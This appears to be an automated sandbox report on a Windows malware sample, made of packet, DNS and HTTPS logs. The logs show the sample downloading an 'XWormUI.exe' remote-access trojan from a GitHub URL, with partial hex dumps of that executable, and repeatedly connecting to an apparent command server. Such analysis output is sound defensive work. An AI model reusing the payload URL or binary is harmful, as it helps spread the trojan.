                                                  Sep 30, 2024 03:24:09.835016966 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.835040092 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.841032028 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.841094971 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.841136932 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.841187954 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.841296911 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.841355085 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.841368914 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.841422081 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.841434002 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.841487885 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.848910093 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.848979950 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.921603918 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.921721935 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.921741962 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.921768904 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.921794891 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.921823025 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.921827078 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.921840906 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.921869993 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.921895027 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.921909094 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.921922922 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.921950102 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.921971083 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.921982050 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.922036886 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.922049999 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.922101974 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.922804117 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.922872066 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.922883987 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.922950029 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.923054934 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.923110962 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.927995920 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.928066969 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.928080082 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.928132057 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.928157091 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.928209066 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.928220987 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.928268909 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.928273916 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.928287029 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.928318977 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.928359985 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.928369999 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.928422928 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.929100990 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929164886 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.929167986 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929184914 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929241896 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.929241896 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.929263115 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929316044 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.929327011 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929374933 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.983901978 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.984028101 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.984096050 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.984126091 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.990436077 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.990474939 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.990498066 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.990540981 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:14.306224108 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:14.311126947 CEST80604971337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:14.311244011 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:14.331377029 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:14.338675022 CEST80604971337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:35.758866072 CEST80604971337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:35.759006977 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.785727978 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.786623955 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.790534019 CEST80604971337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:40.791376114 CEST80604972037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:40.791460037 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.791933060 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.796677113 CEST80604972037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:02.162817955 CEST80604972037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:02.162889004 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.174518108 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.174873114 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.179544926 CEST80604972037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:07.179675102 CEST80606289937.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:07.179740906 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.180074930 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.184822083 CEST80606289937.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:28.554006100 CEST80606289937.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:28.554090023 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.565084934 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.565479994 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.570044994 CEST80606289937.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:33.570394039 CEST80606290137.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:33.570513964 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.570909977 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.575761080 CEST80606290137.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:54.946281910 CEST80606290137.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:54.947144985 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.987008095 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.987312078 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.991935968 CEST80606290137.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:59.992088079 CEST80606290337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:59.992161036 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.992518902 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.997253895 CEST80606290337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:21.351495028 CEST80606290337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:21.351603031 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.361913919 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.362251997 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.366806984 CEST80606290337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:26.366995096 CEST80606290437.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:26.367082119 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.367413998 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.372148991 CEST80606290437.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:47.757034063 CEST80606290437.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:47.757118940 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.768074036 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.768457890 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.772995949 CEST80606290437.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:52.773359060 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:52.773432970 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.773864985 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.778631926 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109146118 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109220028 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109282970 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109390974 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109415054 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:15.109415054 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:15.109448910 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.111927986 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.112298965 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.116839886 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:20.117235899 CEST80606290737.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:20.117311001 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.117793083 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.125153065 CEST80606290737.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:41.493908882 CEST80606290737.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:41.494018078 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.502496004 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.502876043 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.507380962 CEST80606290737.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:46.507678032 CEST80606290837.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:46.509310961 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.509643078 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.514379025 CEST80606290837.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:28:07.886933088 CEST80606290837.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:28:07.887048006 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.893217087 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.893661022 CEST629108060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.898072004 CEST80606290837.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:28:12.898521900 CEST80606291037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:28:12.898597956 CEST629108060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.898907900 CEST629108060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.903711081 CEST80606291037.18.62.18192.168.2.6

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 30, 2024 03:24:07.939327955 CEST5622753192.168.2.61.1.1.1
                                                  Sep 30, 2024 03:24:07.946080923 CEST53562271.1.1.1192.168.2.6
                                                  Sep 30, 2024 03:24:09.124011040 CEST6421153192.168.2.61.1.1.1
                                                  Sep 30, 2024 03:24:09.130640984 CEST53642111.1.1.1192.168.2.6
                                                  Sep 30, 2024 03:24:50.493774891 CEST5349844162.159.36.2192.168.2.6
                                                  Sep 30, 2024 03:24:51.836352110 CEST53508051.1.1.1192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Sep 30, 2024 03:24:07.939327955 CEST192.168.2.61.1.1.10xd90cStandard query (0)github.comA (IP address)IN (0x0001)false
                                                  Sep 30, 2024 03:24:09.124011040 CEST192.168.2.61.1.1.10x12Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Sep 30, 2024 03:24:07.946080923 CEST1.1.1.1192.168.2.60xd90cNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                  Sep 30, 2024 03:24:09.130640984 CEST1.1.1.1192.168.2.60x12No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                  Sep 30, 2024 03:24:09.130640984 CEST1.1.1.1192.168.2.60x12No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                  Sep 30, 2024 03:24:09.130640984 CEST1.1.1.1192.168.2.60x12No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                  Sep 30, 2024 03:24:09.130640984 CEST1.1.1.1192.168.2.60x12No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • github.com
                                                  • raw.githubusercontent.com

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.649710140.82.121.34434976C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-30 01:24:08 UTC157OUTGET /errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe HTTP/1.1
                                                  User-Agent: ProgramDownloader
                                                  Host: github.com
                                                  Cache-Control: no-cache
                                                  2024-09-30 01:24:09 UTC576INHTTP/1.1 302 Found
                                                  Server: GitHub.com
                                                  Date: Mon, 30 Sep 2024 01:24:08 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                  Access-Control-Allow-Origin:
                                                  Location: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe
                                                  Cache-Control: no-cache
                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                  X-Frame-Options: deny
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 0
                                                  Referrer-Policy: no-referrer-when-downgrade
                                                  2024-09-30 01:24:09 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.649712185.199.111.1334434976C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-30 01:24:09 UTC192OUTGET /errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe HTTP/1.1
                                                  User-Agent: ProgramDownloader
                                                  Cache-Control: no-cache
                                                  Host: raw.githubusercontent.com
                                                  Connection: Keep-Alive
                                                  2024-09-30 01:24:09 UTC900INHTTP/1.1 200 OK
                                                  Connection: close
                                                  Content-Length: 49152
                                                  Cache-Control: max-age=300
                                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                  Content-Type: application/octet-stream
                                                  ETag: "6a8de5595cd46d5bff74c4deaee2664415466391102022a2b649b3c3e913d3c7"
                                                  Strict-Transport-Security: max-age=31536000
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: deny
                                                  X-XSS-Protection: 1; mode=block
                                                  X-GitHub-Request-Id: 8322:30117F:A74F2B:B9BC60:66F9FDB9
                                                  Accept-Ranges: bytes
                                                  Date: Mon, 30 Sep 2024 01:24:09 GMT
                                                  Via: 1.1 varnish
                                                  X-Served-By: cache-nyc-kteb1890037-NYC
                                                  X-Cache: MISS
                                                  X-Cache-Hits: 0
                                                  X-Timer: S1727659450.779883,VS0,VE10
                                                  Vary: Authorization,Accept-Encoding,Origin
                                                  Access-Control-Allow-Origin: *
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  X-Fastly-Request-ID: 799bf73c92a11d27d12bad20d722a42b754e573a
                                                  Expires: Mon, 30 Sep 2024 01:29:09 GMT
                                                  Source-Age: 0
                                                  2024-09-30 01:24:09 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b 0a 93 60 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ac 00 00 00 12 00 00 00 00 00 00 ae cb 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL` @ @
                                                  2024-09-30 01:24:09 UTC1378INData Raw: 00 00 0a 2a 5e 28 1b 00 00 0a 02 03 28 1c 00 00 0a 28 70 00 00 06 6f 1d 00 00 0a 2a 56 28 b4 00 00 0a 72 21 1c 00 70 6f 22 00 00 0a 80 41 00 00 04 2a 32 7e 42 00 00 04 02 6f 22 00 00 0a 2a 32 7e 42 00 00 04 02 6f 1d 00 00 0a 2a 32 02 28 fb 00 00 0a 28 77 00 00 06 2a 8e 1a 8d 4f 00 00 01 25 19 02 d2 9c 25 18 02 1e 63 d2 9c 25 17 02 1f 10 63 d2 9c 25 16 02 1f 18 63 d2 9c 2a 4e 18 8d 4f 00 00 01 25 17 02 d2 9c 25 16 02 1e 63 d2 9c 2a 32 02 28 fc 00 00 0a 28 77 00 00 06 2a 2e 73 fd 00 00 0a 80 42 00 00 04 2a 56 02 15 7d 44 00 00 04 02 28 1a 00 00 0a 02 03 7d 43 00 00 04 2a 4a 02 7b 43 00 00 04 02 7b 44 00 00 04 6f fe 00 00 0a 2a 8a 02 02 7b 44 00 00 04 17 58 7d 44 00 00 04 02 7b 44 00 00 04 02 7b 43 00 00 04 6f ff 00 00 0a fe 04 2a 22 02 15 7d 44 00 00 04 2a
                                                  Data Ascii: *^(((po*V(r!po"A*2~Bo"*2~Bo*2((w*O%%c%c%c*NO%%c*2((w*.sB*V}D(}C*J{C{Do*{DX}D{D{Co*"}D*
                                                  2024-09-30 01:24:09 UTC1378INData Raw: 04 7e 13 00 00 04 6f 6f 00 00 06 80 13 00 00 04 7e 0c 00 00 04 7e 12 00 00 04 6f 6f 00 00 06 80 12 00 00 04 7e 0c 00 00 04 7e 0e 00 00 04 6f 6f 00 00 06 80 0e 00 00 04 7e 0c 00 00 04 7e 11 00 00 04 6f 6f 00 00 06 80 11 00 00 04 28 53 00 00 06 80 0f 00 00 04 7e 0c 00 00 04 7e 0a 00 00 04 6f 6f 00 00 06 80 0a 00 00 04 7e 0c 00 00 04 7e 09 00 00 04 6f 6f 00 00 06 28 1c 00 00 0a 73 1e 00 00 0a 80 0b 00 00 04 28 04 00 00 06 0a dd 08 00 00 00 26 16 0a dd 00 00 00 00 06 2a 00 00 00 41 1c 00 00 00 00 00 00 00 00 00 00 37 01 00 00 37 01 00 00 08 00 00 00 01 00 00 01 1b 30 04 00 67 00 00 00 03 00 00 11 7e 0b 00 00 04 6f 1f 00 00 0a 6f 20 00 00 0a 74 36 00 00 01 0a 73 21 00 00 0a 0b 06 07 28 1b 00 00 0a 7e 07 00 00 04 6f 22 00 00 0a 6f 23 00 00 0a 72 01 00 00 70 28
                                                  Data Ascii: ~oo~~oo~~oo~~oo(S~~oo~~oo(s(&*A770g~oo t6s!(~o"o#rp(
                                                  2024-09-30 01:24:09 UTC1378INData Raw: 00 26 38 05 00 00 00 28 44 00 00 0a 28 10 00 00 06 25 3a 06 00 00 00 26 38 05 00 00 00 28 44 00 00 0a 28 08 00 00 06 25 3a 06 00 00 00 26 38 05 00 00 00 28 45 00 00 0a 28 06 00 00 06 25 3a 06 00 00 00 26 38 05 00 00 00 28 46 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 16 28 13 00 00 06 2a 00 00 01 10 00 00 00 00 00 00 5d 5d 00 06 01 00 00 01 1b 30 06 00 ba 01 00 00 05 00 00 11 28 06 00 00 06 6f 30 00 00 0a 39 0a 00 00 00 28 12 00 00 06 3a 0b 00 00 00 16 28 13 00 00 06 dd 95 01 00 00 28 08 00 00 06 02 6f 47 00 00 0a 0a 06 16 3e 6b 01 00 00 28 0e 00 00 06 06 6a 58 28 0f 00 00 06 28 0c 00 00 06 06 6a 59 28 0d 00 00 06 28 0c 00 00 06 3a 02 01 00 00 28 0a 00 00 06 16 28 48 00 00 0a 6a 28 0d 00 00 06 28 0c 00 00 06 16 6a 3e c2 00 00 00 16 6a 28 0f 00 00 06 28 0c
                                                  Data Ascii: &8(D(%:&8(D(%:&8(E(%:&8(F&(*]]0(o09(:((oG>k(jX((jY((:((Hj((j>j((
                                                  2024-09-30 01:24:09 UTC1343INData Raw: 24 00 00 06 dd aa 00 00 00 6f 57 00 00 0a 28 26 00 00 06 dd 9b 00 00 00 06 72 43 13 00 70 6f 9e 00 00 06 6f aa 00 00 06 06 72 17 13 00 70 6f 9e 00 00 06 6f 99 00 00 06 28 67 00 00 06 26 7e 1f 00 00 04 28 01 00 00 2b 6f 59 00 00 0a 0c 38 44 00 00 00 12 02 28 5a 00 00 0a 0d 09 72 17 13 00 70 6f 9e 00 00 06 6f aa 00 00 06 06 72 43 13 00 70 6f 9e 00 00 06 6f aa 00 00 06 28 2a 00 00 0a 39 12 00 00 00 09 28 24 00 00 06 7e 1f 00 00 04 09 6f 5b 00 00 0a 26 12 02 28 5c 00 00 0a 2d b3 dd 0e 00 00 00 12 02 fe 16 03 00 00 1b 6f 26 00 00 0a dc dd 0f 00 00 00 6f 57 00 00 0a 28 26 00 00 06 dd 00 00 00 00 2a 41 4c 00 00 00 00 00 00 a4 00 00 00 79 00 00 00 1d 01 00 00 0f 00 00 00 3d 00 00 01 02 00 00 00 62 01 00 00 57 00 00 00 b9 01 00 00 0e 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: $oW(&rCpoorpoo(g&~(+oY8D(ZrpoorCpoo(*9($~o[&(\-o&oW(&*ALy=bW
                                                  2024-09-30 01:24:09 UTC1378INData Raw: 8d 00 00 0a 11 09 72 c7 15 00 70 6f 8d 00 00 0a 11 09 72 e7 15 00 70 06 6f 76 00 00 0a 72 fc 14 00 70 28 85 00 00 0a 6f 8d 00 00 0a 11 09 72 fd 15 00 70 28 8e 00 00 0a 28 69 00 00 0a 6f 8d 00 00 0a 11 09 72 05 16 00 70 11 08 28 8f 00 00 0a 72 11 16 00 70 28 85 00 00 0a 6f 8d 00 00 0a dd 0f 00 00 00 11 09 39 07 00 00 00 11 09 6f 26 00 00 0a dc 73 7a 00 00 0a 25 11 08 6f 7b 00 00 0a 25 17 6f 81 00 00 0a 25 16 6f 90 00 00 0a 25 16 6f 91 00 00 0a 25 17 6f 80 00 00 0a 28 82 00 00 0a 26 16 28 18 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 41 64 00 00 00 00 00 00 51 00 00 00 28 00 00 00 79 00 00 00 06 00 00 00 01 00 00 01 02 00 00 00 3c 01 00 00 2c 00 00 00 68 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 db 01 00 00 6c 00 00 00 47 02 00 00 0f 00 00 00 00 00
                                                  Data Ascii: rporpovrp(orp((iorp(rp(o9o&sz%o{%o%o%o%o(&(&*AdQ(y<,hlG
